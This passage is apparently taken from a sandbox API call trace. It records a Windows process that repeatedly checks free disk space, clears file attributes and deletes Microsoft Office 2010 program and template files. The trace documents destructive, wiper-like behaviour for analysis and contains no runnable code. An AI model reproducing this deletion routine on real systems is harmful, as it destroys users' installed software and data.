Office\\Office14\\Microsoft.Office.BusinessApplications.Runtime.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessapplications.runtime.xml")) returned 1 [0070.209] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.RuntimeUi.xml", dwFileAttributes=0x80) returned 1 [0070.214] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.RuntimeUi.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessapplications.runtimeui.xml")) returned 1 [0070.217] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.240] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessData.xml", dwFileAttributes=0x80) returned 1 [0070.241] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessData.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessdata.xml")) returned 1 [0070.244] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.341] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.SemiTrust.xml", dwFileAttributes=0x80) returned 1 [0070.341] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.SemiTrust.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.interop.infopath.semitrust.xml")) returned 1 [0070.351] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.411] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.Xml.xml", dwFileAttributes=0x80) returned 1 [0070.411] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.Xml.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.interop.infopath.xml.xml")) returned 1 [0070.418] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.443] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.SharePoint.BusinessData.Administration.Client.xml", dwFileAttributes=0x80) returned 1 [0070.443] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.SharePoint.BusinessData.Administration.Client.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.sharepoint.businessdata.administration.client.xml")) returned 1 [0070.447] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.451] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\msaccess.exe.manifest", dwFileAttributes=0x80) returned 1 [0070.452] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\msaccess.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\msaccess.exe.manifest")) returned 1 [0070.456] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mspub.exe.manifest", dwFileAttributes=0x80) returned 1 [0070.461] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mspub.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\mspub.exe.manifest")) returned 1 [0070.465] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.474] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRM.XML", dwFileAttributes=0x80) returned 1 [0070.475] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\olkirm.xml")) returned 1 [0070.478] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.488] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRMV.XML", dwFileAttributes=0x80) returned 1 [0070.488] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRMV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\olkirmv.xml")) returned 1 [0070.494] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.503] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ONENOTEIRM.XML", dwFileAttributes=0x80) returned 1 [0070.503] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ONENOTEIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\onenoteirm.xml")) returned 1 [0070.507] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.515] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OSPP.HTM", dwFileAttributes=0x80) returned 1 [0070.515] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office14\\ospp.htm")) returned 1 [0070.518] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.522] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OUTLOOK.EXE.MANIFEST", dwFileAttributes=0x80) returned 1 [0070.523] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OUTLOOK.EXE.MANIFEST" (normalized: "c:\\program files\\microsoft office\\office14\\outlook.exe.manifest")) returned 1 [0070.526] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\powerpnt.exe.manifest", dwFileAttributes=0x80) returned 1 [0070.530] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\powerpnt.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\powerpnt.exe.manifest")) returned 1 [0070.534] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.543] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRM.XML", dwFileAttributes=0x80) returned 1 [0070.543] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pptirm.xml")) returned 1 [0070.547] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.557] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRMV.XML", dwFileAttributes=0x80) returned 1 [0070.557] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRMV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pptirmv.xml")) returned 1 [0070.560] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\REMINDER.WAV", dwFileAttributes=0x80) returned 1 [0070.571] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\REMINDER.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\reminder.wav")) returned 1 [0070.575] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SketchPadTestSchema.xml", dwFileAttributes=0x80) returned 1 [0070.579] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SketchPadTestSchema.xml" (normalized: "c:\\program files\\microsoft office\\office14\\sketchpadtestschema.xml")) returned 1 [0070.582] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.589] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SLERROR.XML", dwFileAttributes=0x80) returned 1 [0070.589] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\slerror.xml")) returned 1 [0070.594] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.599] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\visio.exe.manifest", dwFileAttributes=0x80) returned 1 [0070.599] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\visio.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\visio.exe.manifest")) returned 1 [0070.603] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.607] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\winproj.exe.manifest", dwFileAttributes=0x80) returned 1 [0070.607] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\winproj.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\winproj.exe.manifest")) returned 1 [0070.610] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.620] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\WORDIRM.XML", dwFileAttributes=0x80) returned 1 [0070.620] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\WORDIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\wordirm.xml")) returned 1 [0070.626] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\WORDIRMV.XML", dwFileAttributes=0x80) returned 1 [0070.634] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\WORDIRMV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\wordirmv.xml")) returned 1 [0070.638] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.648] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\XLCPRTID.XML", dwFileAttributes=0x80) returned 1 [0070.648] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\XLCPRTID.XML" (normalized: "c:\\program files\\microsoft office\\office14\\xlcprtid.xml")) returned 1 [0070.652] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0070.652] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0070.652] CoTaskMemFree (pv=0x506980) [0070.677] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0070.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BASIC.HTM", dwFileAttributes=0x80) returned 1 [0070.681] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BASIC.HTM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\basic.htm")) returned 1 [0070.684] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0070.692] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CT_ROOTS.XML", dwFileAttributes=0x80) returned 1 [0070.692] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CT_ROOTS.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ct_roots.xml")) returned 1 [0070.696] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0070.753] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBSAMPLE.MDB", dwFileAttributes=0x80) returned 1 [0070.753] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBSAMPLE.MDB" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbsample.mdb")) returned 1 [0070.761] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0070.771] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.XLA", dwFileAttributes=0x80) returned 1 [0070.774] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.XLA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\exptoows.xla")) returned 1 [0070.782] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0070.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCCMPVRD.XML", dwFileAttributes=0x80) returned 1 [0070.786] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCCMPVRD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\occmpvrd.xml")) returned 1 [0070.790] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0070.794] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCMODVRD.XML", dwFileAttributes=0x80) returned 1 [0070.794] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCMODVRD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ocmodvrd.xml")) returned 1 [0070.849] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0070.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLPERF.H", dwFileAttributes=0x80) returned 1 [0070.854] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLPERF.H" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlperf.h")) returned 1 [0071.012] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0071.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLN.DOC", dwFileAttributes=0x80) returned 1 [0071.021] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLN.DOC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\prottpln.doc")) returned 1 [0071.024] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0071.049] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLN.PPT", dwFileAttributes=0x80) returned 1 [0071.049] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLN.PPT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\prottpln.ppt")) returned 1 [0071.052] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0071.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLN.XLS", dwFileAttributes=0x80) returned 1 [0071.057] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLN.XLS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\prottpln.xls")) returned 1 [0071.060] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0071.066] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLV.DOC", dwFileAttributes=0x80) returned 1 [0071.066] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLV.DOC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\prottplv.doc")) returned 1 [0071.069] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0071.074] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLV.PPT", dwFileAttributes=0x80) returned 1 [0071.074] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLV.PPT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\prottplv.ppt")) returned 1 [0071.078] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0071.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLV.XLS", dwFileAttributes=0x80) returned 1 [0071.282] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLV.XLS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\prottplv.xls")) returned 1 [0071.301] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0071.307] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDCMPVRD.XML", dwFileAttributes=0x80) returned 1 [0071.307] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDCMPVRD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wdcmpvrd.xml")) returned 1 [0071.316] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.316] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.316] CoTaskMemFree (pv=0x506980) [0071.318] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\BIBFORM.XML", dwFileAttributes=0x80) returned 1 [0071.329] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\BIBFORM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bibliography\\bibform.xml")) returned 1 [0071.332] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.332] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.332] CoTaskMemFree (pv=0x506980) [0071.335] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.340] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\+Connect to New Data Source.odc", dwFileAttributes=0x80) returned 1 [0071.340] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\+Connect to New Data Source.odc" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\+connect to new data source.odc")) returned 1 [0071.342] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.346] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\+NewSQLServerConnection.odc", dwFileAttributes=0x80) returned 1 [0071.349] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft 